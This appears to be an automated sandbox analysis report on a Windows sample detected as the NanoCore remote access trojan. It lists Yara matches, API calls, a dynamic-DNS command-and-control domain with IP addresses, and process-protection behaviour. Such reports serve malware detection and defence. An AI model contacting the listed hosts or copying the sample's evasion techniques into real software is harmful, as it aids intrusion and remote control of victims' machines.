        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ameHrrFwNp.exe, 00000001.00000000.294783561.0000000000DA2000.00000002.00020000.sdmp
        Source: Binary string: RegSvcs.pdb, source: bspmflqee.pif, 00000004.00000003.393712127.0000000001299000.00000004.00000001.sdmp, RegSvcs.exe, 00000005.00000000.386280136.0000000000DD2000.00000002.00020000.sdmp, RegSvcs.exe, 00000009.00000002.411075709.00000000006F2000.00000002.00020000.sdmp, dhcpmon.exe, 0000000D.00000002.413266242.0000000000942000.00000002.00020000.sdmp, RegSvcs.exe, 00000013.00000002.444255890.0000000000102000.00000002.00020000.sdmp, dhcpmon.exe, 00000014.00000000.437845496.0000000000722000.00000002.00020000.sdmp, RegSvcs.exe, 00000018.00000002.492189058.0000000000F32000.00000002.00020000.sdmp, RegSvcs.exe, 00000020.00000000.514780927.0000000000EE2000.00000002.00020000.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, RegSvcs.exe, 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, RegSvcs.exe, 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, RegSvcs.exe, 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, dhcpmon.exe, 00000014.00000000.437845496.0000000000722000.00000002.00020000.sdmp, RegSvcs.exe, 00000018.00000002.492189058.0000000000F32000.00000002.00020000.sdmp, RegSvcs.exe, 00000020.00000000.514780927.0000000000EE2000.00000002.00020000.sdmp
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D7A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00D7A2DF
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D99FD3 FindFirstFileExA,1_2_00D99FD3
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00D8AFB9
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FC399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_00FC399B

        Networking:

        barindex
        Connects to many ports of the same IP (likely port scanning)Show sources
        Source: global trafficTCP traffic: 185.19.85.175 ports 2,4,5,6,8,48562
        Source: global trafficTCP traffic: 197.210.54.24 ports 2,4,5,6,8,48562
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: strongodss.ddns.net
        Source: global trafficTCP traffic: 192.168.2.3:49776 -> 197.210.54.24:48562
        Source: global trafficTCP traffic: 192.168.2.3:49802 -> 185.19.85.175:48562
        Source: RegSvcs.exe, 00000005.00000002.570251514.0000000003861000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: unknownDNS traffic detected: queries for: strongodss.ddns.net
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
        Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
        Source: bspmflqee.pif, 00000004.00000002.395145538.000000000126A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
        Source: RegSvcs.exe, 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48bb041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42a9c50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1b041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48b07ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3beb041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476b041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3be560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3dee458.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.43c7078.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3beb041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.42f5058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a15448.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.11a0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e23078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3d85448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476b041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4313078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.4275448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.43c7078.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3db9c50.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.47607ce.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.435e068.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1b041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.500000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a1560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.RegSvcs.exe.3be07ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb0000.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb4629.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3e8c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a7e458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.bspmflqee.pif.42f5058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42a9c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3db9c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48b560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.437c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a7e458.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.3.bspmflqee.pif.3dee458.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.48bb041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4ab3078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4a49c50.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.RegSvcs.exe.6fb0000.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.476560b.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 24.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.RegSvcs.exe.4a107ce.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.3.bspmflqee.pif.42de458.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.3.bspmflqee.pif.4b1c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000003.386724490.00000000042F6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386483303.0000000004393000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.450263245.0000000002B91000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513759179.000000000437C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513522579.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513627931.0000000004314000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513035581.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513434193.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513576200.0000000004314000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516238923.0000000004313000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513192668.00000000042AA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.539382391.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516361406.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.570251514.0000000003861000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513666767.0000000004348000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.537091542.0000000001302000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516187648.00000000042AA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.469466887.0000000003E58000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468029326.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471893908.0000000003D86000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.471520869.0000000003DEF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.515810065.00000000042DF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.516555865.0000000004241000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.492519775.0000000001302000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.513089293.0000000004241000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.512868270.0000000004276000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000018.00000002.493877285.0000000004719000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 3836, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4644, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 1048, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 3032, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 4732, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR

        Operating System Destruction:

        barindex
        Protects its processes via BreakOnTermination flagShow sources
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: 01 00 00 00 Jump to behavior

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 32.2.RegSvcs.exe.3a2e6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 5.2.RegSvcs.exe.48bb041.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.4313078.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.4313078.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 29.3.bspmflqee.pif.42a9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.42a9c50.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 24.2.RegSvcs.exe.47607ce.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e23078.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e23078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.6f90000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.RegSvcs.exe.3be07ce.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.4313078.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.4313078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 32.2.RegSvcs.exe.4a1b041.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 5.2.RegSvcs.exe.48b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 5.2.RegSvcs.exe.48b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.388df38.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a49c50.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a49c50.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 32.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 32.2.RegSvcs.exe.1300000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.bspmflqee.pif.4b1c088.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4b1c088.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.RegSvcs.exe.3beb041.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4ab3078.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4ab3078.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 24.2.RegSvcs.exe.476b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.RegSvcs.exe.3be560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.RegSvcs.exe.3be560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.3.bspmflqee.pif.3e23078.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e23078.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.3.bspmflqee.pif.3e23078.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e23078.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.bspmflqee.pif.4ab3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4ab3078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.388df38.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3dee458.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3dee458.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.3.bspmflqee.pif.3e8c088.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e8c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 29.3.bspmflqee.pif.4313078.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.4313078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.3.bspmflqee.pif.43c7078.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.bspmflqee.pif.43c7078.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.3.bspmflqee.pif.3e8c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e8c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 29.3.bspmflqee.pif.437c088.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.437c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 19.2.RegSvcs.exe.3beb041.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.bspmflqee.pif.42f5058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.437c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.3.bspmflqee.pif.42f5058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.bspmflqee.pif.4ab3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4ab3078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 29.3.bspmflqee.pif.437c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.3.bspmflqee.pif.4a15448.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.3.bspmflqee.pif.4a15448.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 24.2.RegSvcs.exe.3779650.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.3.bspmflqee.pif.3e23078.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
